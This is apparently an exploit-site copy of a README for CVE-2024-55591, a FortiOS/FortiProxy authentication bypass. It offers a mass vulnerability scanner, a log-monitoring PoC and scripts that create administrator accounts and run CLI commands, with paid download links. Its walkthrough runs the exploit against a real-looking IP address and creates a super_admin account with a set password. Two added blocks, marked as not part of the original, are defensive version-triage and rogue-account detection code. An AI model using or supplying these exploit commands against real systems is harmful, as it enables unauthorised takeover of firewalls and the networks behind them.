## https://sploitus.com/exploit?id=A91322A5-4A8F-53D6-82F4-3D77EE20F151
# CVE-2024-55591
### If you're reading this, you most likely know what we're talking about.
[DOWNLOAD](https://satoshidisk.com/pay/CNfsqE)
# Vulnerability Scanner
## Description
This script attempts to create a WebSocket connection at a random URL from a pre-authenticated perspective to the FortiOS management interface, and reviews the response to determine if the instance is VULNERABLE.
### Checks the file with ip addresses for vulnerability
## USAGE
Checks your text document of IP addresses for the vulnerability:
```bash
python3 check.py --file ips.txt --port 443
```


# poc.py (Event Listening and Tracking)
## Description
Using this PoC, you can bypass authentication and see the system log.
## USAGE
Opens the listener and shows all actions performed on the server.
```bash
python3 poc.py --target TARGET
```

You can also customize the activity tracking setting and put a filter on the tasks you need to do.

![image](https://github.com/user-attachments/assets/2790e355-9640-45c1-b358-30b131bdaa81)

Replace `*` with the action you wish to track, for example `LOG_ID_ADMIN_LOGIN_SUCC`, which shows only successful administrator logins.

# ADMIN CREATION
## Description
Using this exploit, you can create an administrator and add the administrator to a VPN group.
## USAGE
Set the required IP Address in the code before startup.

![image](https://github.com/user-attachments/assets/896d0c6a-67d2-4234-bf47-5bcc91f8d7f4)

```bash
python3 adadmin.py
```

![image](https://github.com/user-attachments/assets/a1978c49-3b08-4be9-aabd-2140b3d19c22)


# CMD
## Description
Using this exploit, you can bypass authentication and run commands.
## USAGE
```bash
exp.py --target TARGET [--port PORT] [--username USERNAME] [--cmd CMD]
```

## Affected Versions

- FortiOS 7.0.0 through 7.0.16
- FortiProxy 7.0.0 through 7.0.19
- FortiProxy 7.2.0 through 7.2.12

[More details](https://www.fortiguard.com/psirt/FG-IR-24-535)
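
For defenders triaging an inventory against the ranges listed above, the following is an added example (not part of the original README or its scripts). The function names, hostnames and version strings are constructed for illustration; the ranges are copied from the list above.

```python
import re

# Affected ranges exactly as listed on this page: (product, first, last), inclusive.
AFFECTED = [
    ("FortiOS",    (7, 0, 0), (7, 0, 16)),
    ("FortiProxy", (7, 0, 0), (7, 0, 19)),
    ("FortiProxy", (7, 2, 0), (7, 2, 12)),
]

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)")

def parse_version(text):
    """Extract (major, minor, patch) as integers from strings such as 'v7.0.9,build0444'."""
    match = _VERSION_RE.search(text)
    if not match:
        raise ValueError(f"no x.y.z version found in {text!r}")
    return tuple(int(part) for part in match.groups())

def is_affected(product, version_text):
    """Compare numerically: as strings, '7.0.9' would sort after '7.0.16'."""
    version = parse_version(version_text)
    return any(product.lower() == name.lower() and first <= version <= last
               for name, first, last in AFFECTED)

def triage(inventory):
    """Return the sorted hostnames whose product and version fall in an affected range."""
    return sorted(host for host, product, version in inventory
                  if is_affected(product, version))

# Constructed inventory, for illustration only.
SAMPLE_INVENTORY = [
    ("fw-edge-01", "FortiOS", "v7.0.9,build0444"),
    ("fw-edge-02", "FortiOS", "v7.0.17"),
    ("proxy-01", "FortiProxy", "7.2.12"),
    ("fw-lab", "FortiOS", "v7.2.5"),
]

if __name__ == "__main__":
    print(triage(SAMPLE_INVENTORY))
```
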


# USAGE INSTRUCTIONS

## Vulnerability Scanner

I use a remote server for work; the operating system is Ubuntu.

Update the server:
```bash
sudo apt update && sudo apt upgrade -y
```

Install Python:
```bash
sudo apt install python3
```

Check the version:
```bash
python3 --version
```

Install pip:
```bash
sudo apt install python3-pip
```

Check the pip version:
```bash
pip3 --version
```

Install screen:
```bash
sudo apt install screen
```

Make a directory for the scripts:
```bash
mkdir scrypts
```

Move into the folder:
```bash
cd scrypts
```

Move the scripts and related files to the folder.

Install the venv package:
```bash
apt install python3.10-venv
```

Create a virtual environment:
```bash
python3 -m venv pintest
```

Activate the venv:
```bash
source pintest/bin/activate
```

Install the libraries:
```bash
pip install requests
```

Start the checker script:
```bash
python3 checker.py --file ips.txt --port 443
```

The file containing the target IP addresses must be located in the script directory.

![image](https://github.com/user-attachments/assets/b542b587-38d0-47e1-a9f0-b2d43bec2afc)


# Using POC to monitor events
I will be using a previously configured system to run the scripts; for this reason I will go straight to the description of the workflow rather than the system configuration.

The poc.py script requires more libraries, so install the necessary ones:
```bash
pip install pwntools
```
Run the code. Set your surveillance data:
```bash
python3 poc.py --target TARGET
```

I think I witnessed someone brute-forcing this server.

![image](https://github.com/user-attachments/assets/e2416532-3c44-4ad7-a8aa-deed4961aa0d)

The code that creates an Administrator and adds him to a VPN group, as well as the code that opens the command line, can be obtained here: [DOWNLOAD](https://satoshidisk.com/pay/CNbsC7)
## CLI ON THE FORTINET
Add the necessary libraries:
```bash
pip install websocket
```
```bash
pip install websocket-client
```
The first thing we want to do is check our admin accounts, add them and view them. To do this, I suggest sending a command to the server that shows all the users registered on this system:

```bash
python3 exp.py --host 5.172.67.204  --port 443 --command "show user local" --ssl
```
![image](https://github.com/user-attachments/assets/49c9b5b7-c897-41be-84f1-3b0e0615ae97)
![image](https://github.com/user-attachments/assets/d349a258-76d1-4597-af71-832211c9e144)

To make sure that we create a new network administrator (call it by its new name), run the following command:

```bash
python3 exp.py --host 5.172.67.204 --port 443 --command "config user local
edit bitshift
set type password
set passwd Githubrobomusk
set accprofile super_admin
next
end" --ssl
```
![image](https://github.com/user-attachments/assets/7b221158-ad31-40c1-b796-038d2b20eeab)

Then repeat the command that displays the list of network users:
```bash
python3 exp.py --host 5.172.67.204  --port 443 --command "show user local" --ssl
```
![image](https://github.com/user-attachments/assets/bf1b7bf3-89c8-4542-8f64-49638dc04fd4)
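
From the defender's side, accounts added this way show up in a configuration backup. The following added example (not part of the original README or its scripts) parses the `config` / `edit` / `set` / `next` / `end` block syntax shown above and lists accounts that are absent from a known-good baseline. The sample configuration, the baseline and the function names are constructed for illustration.

```python
import shlex

# Constructed sample of a configuration backup (not real device output).
SAMPLE_CONFIG = '''
config system admin
    edit "admin"
        set accprofile "super_admin"
        config gui-dashboard
            edit 1
            next
        end
    next
end
config user local
    edit "vpn-alice"
    next
    edit "bitshift"
        set accprofile super_admin
    next
end
'''

def parse_accounts(config_text, sections):
    """Return {section: {entry_name: {setting: value}}} for the named top-level sections."""
    accounts = {s: {} for s in sections}
    stack, entry = [], None   # open 'config' blocks; current top-level entry
    for line in config_text.splitlines():
        try:
            verb, *args = shlex.split(line) or [""]
        except ValueError:    # unbalanced quote, e.g. a multi-line certificate value
            continue
        if verb == "config":
            stack.append(" ".join(args))
        elif verb == "end" and stack:
            stack.pop()
        elif len(stack) == 1 and stack[0] in accounts:  # ignore nested sub-tables
            if verb == "edit" and args:
                entry = accounts[stack[0]].setdefault(args[0], {})
            elif verb == "next":
                entry = None
            elif verb == "set" and entry is not None and args:
                entry[args[0]] = " ".join(args[1:])
    return accounts

def unexpected_accounts(config_text, baseline):
    """List (section, name, accprofile) for accounts missing from the baseline."""
    found = parse_accounts(config_text, tuple(baseline))
    return sorted((sec, name, cfg.get("accprofile")) for sec, entries in found.items()
                  for name, cfg in entries.items() if name not in baseline[sec])
```

Run it against each scheduled backup with a baseline taken from a reviewed configuration; any returned tuple is an account nobody approved.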

With working access to the Fortinet CLI we can do anything. To download additional materials, CLI commands and other related stuff, as well as to contact me, use the link here:

[DOWNLOAD](https://satoshidisk.com/pay/CNfsqE)